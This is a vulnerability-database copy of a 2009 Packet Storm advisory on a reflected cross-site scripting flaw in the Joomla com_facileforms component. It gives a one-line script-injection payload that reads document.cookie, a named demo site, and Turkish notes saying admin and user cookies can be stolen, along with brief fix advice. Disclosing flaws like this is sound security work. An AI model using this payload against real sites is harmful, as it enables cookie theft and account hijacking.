Lucene search
K
Database
Vendors
Products
Years
CVSS
Scanner
Agent Scanning
API Scanning
Manual Audit
Perimeter Scanner
Scanning
Projects
Email
Webhook
Plugins
Resources
Documents
Blog
Glossary
FAQ
Pricing
Contacts
About Us
Partners
Branding Guideline
packetstormPyskePACKETSTORM:84308
HistoryDec 30, 2009 - 12:00 a.m.

Joomla Facile Forms Cross Site Scripting

2009-12-3000:00:00
Pyske
packetstormsecurity.com
26
JSON
`  
< ------------------- header data start ------------------- >  
  
###########################################################################  
Joomla Component com_facileforms Cross Site Scripting Vulnerabilities   
###########################################################################  
  
# Author : Pyske  
  
  
# Greetz : Fl0riX , M-K-A , F0RTS3V3N , 3KB3R ,system-Hacker ,HeroTurK ,fireofdevil and ALL Cyber-Warrior  
  
  
# Name : com_facileforms  
  
  
# Bug Type : Cross Site Scripting  
  
  
# Infection : Yönetici ve User cookiekleri calinabilir.  
  
  
# Bug Fix Advice : Zararlı karakterler filtrelenmelidir.  
  
  
# Demo Vuln. : http://mine.com.tr/index.php?option=com_facileforms&Itemid=[XSS CODE]  
  
#############################################################  
  
< ------------------- header data end of ------------------- >  
  
  
< -- bug code start -- >  
  
  
index.php?option=com_facileforms&Itemid="><script>alert(document.cookie)</script>  
  
  
< -- bug code end of -- >   
  
  
‏  
  
_________________________________________________________________  
Windows Live Hotmail: Arkadaşlarınız Facebook'taki güncellemelerinizi doğrudan Hotmail®'den alır.  
http://www.microsoft.com/windows/windowslive/see-it-in-action/social-network-basics.aspx?ocid=PID23461::T:WLMTAGL:ON:WL:tr-tr:SI_SB_4:092009`
JSON